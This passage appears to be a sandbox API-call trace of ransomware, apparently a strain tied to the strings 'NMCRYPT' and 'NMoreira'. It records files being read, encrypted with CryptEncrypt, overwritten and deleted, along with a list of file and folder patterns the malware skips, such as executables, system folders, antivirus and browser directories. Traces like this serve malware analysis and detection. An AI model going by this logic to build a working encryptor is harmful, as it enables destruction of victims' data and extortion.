lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.043] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.044] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.044] GetLastError () returned 0x0 [0144.044] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.044] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.044] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.044] GetLastError () returned 0x0 [0144.044] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.044] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.044] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.044] GetLastError () returned 0x0 [0144.044] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.044] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.044] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.044] GetLastError () returned 0x0 [0144.044] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.044] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.044] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.044] GetLastError () returned 0x0 [0144.044] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.044] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.044] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.044] GetLastError () returned 0x0 [0144.044] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.044] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.044] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.045] GetLastError () returned 0x0 [0144.045] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.045] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.045] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.045] GetLastError () returned 0x0 [0144.045] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.045] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.045] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.045] GetLastError () returned 0x0 [0144.045] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.045] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.045] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.045] GetLastError () returned 0x0 [0144.045] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.045] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.045] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.045] GetLastError () returned 0x0 [0144.045] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.045] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0xa5, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0xa5, lpOverlapped=0x0) returned 1 [0144.045] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0xa5, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0xb0) returned 1 [0144.045] GetLastError () returned 0x0 [0144.045] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0xb0, lpOverlapped=0x0) returned 1 [0144.045] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0144.045] WriteFile (in: hFile=0x588, lpBuffer=0x2974d38*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0144.045] CloseHandle (hObject=0x1618) returned 1 [0144.046] CloseHandle (hObject=0x588) returned 1 [0144.046] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml")) returned 0x20 [0144.047] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml", dwFileAttributes=0x20) returned 0 [0144.047] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 1 [0144.047] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml")) returned 0 [0144.047] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" [0144.047] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0144.047] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXA57E.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxa57e.tmp")) returned 0xa57e [0144.048] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXA57E.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxa57e.tmp"), dwFlags=0x1) returned 0 [0144.048] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXA57E.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxa57e.tmp")) returned 1 [0144.048] CryptDestroyKey (hKey=0x982110) returned 1 [0144.048] wcslen (_String="OK") returned 0x2 [0144.048] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0144.048] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0144.048] CryptDestroyKey (hKey=0x982010) returned 1 [0144.048] CryptDestroyHash (hHash=0x9820d0) returned 1 [0144.048] CryptReleaseContext (hProv=0x8e3990, dwFlags=0x0) returned 1 [0144.048] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.048] wcscmp (_String1="cs-CZ", _String2=".") returned 1 [0144.048] wcscmp (_String1="cs-CZ", _String2="..") returned 1 [0144.048] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.048] wcscmp (_String1="da-DK", _String2=".") returned 1 [0144.048] wcscmp (_String1="da-DK", _String2="..") returned 1 [0144.049] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.049] wcscmp (_String1="de-DE", _String2=".") returned 1 [0144.049] wcscmp (_String1="de-DE", _String2="..") returned 1 [0144.049] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.049] wcscmp (_String1="el-GR", _String2=".") returned 1 [0144.049] wcscmp (_String1="el-GR", _String2="..") returned 1 [0144.049] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.049] wcscmp (_String1="en-GB", _String2=".") returned 1 [0144.049] wcscmp (_String1="en-GB", _String2="..") returned 1 [0144.049] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.049] wcscmp (_String1="en-US", _String2=".") returned 1 [0144.049] wcscmp (_String1="en-US", _String2="..") returned 1 [0144.049] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.049] wcscmp (_String1="es-ES", _String2=".") returned 1 [0144.049] wcscmp (_String1="es-ES", _String2="..") returned 1 [0144.049] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.049] wcscmp (_String1="es-MX", _String2=".") returned 1 [0144.049] wcscmp (_String1="es-MX", _String2="..") returned 1 [0144.049] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.049] wcscmp (_String1="et-EE", _String2=".") returned 1 [0144.049] wcscmp (_String1="et-EE", _String2="..") returned 1 [0144.049] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.049] wcscmp (_String1="fi-FI", _String2=".") returned 1 [0144.049] wcscmp (_String1="fi-FI", _String2="..") returned 1 [0144.049] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.049] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*NMCRYPT") returned 0 [0144.049] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*Recovers your files.html") returned 0 [0144.049] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*.exe") returned 0 [0144.049] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*.dll") returned 0 [0144.049] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*.lnk") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*.bat") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*.ini") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*.msi") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*.scf") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*pagefile.sys*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*NTUSER.DAT*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*AppData*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*\\winrar\\*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*\\Internet Explorer\\*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*\\java\\*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*\\TeamViewer\\*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*\\windows\\*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*\\ESET\\*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*\\AVG\\*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*\\AVIRA\\*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*\\AVAST Software\\*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*Atheros*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*Realtek*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*bootmgr*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*boot*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*boot*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*CONFIG.SYS*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*IO.SYS*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*MSDOS.SYS*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*NTDETECT.COM*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*ntldr*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*chrome*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*opera*") returned 0 [0144.050] PathMatchSpecW (pszFile="FlickAnimation.avi", pszSpec="*firefox*") returned 0 [0144.050] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi", pszSpec="*") returned 1 [0144.050] strlen (_Str="NMoreira") returned 0x8 [0144.050] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.050] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.050] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.050] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.050] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.050] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.050] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.050] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.050] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.050] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.050] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.050] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.050] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.050] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.050] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.050] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 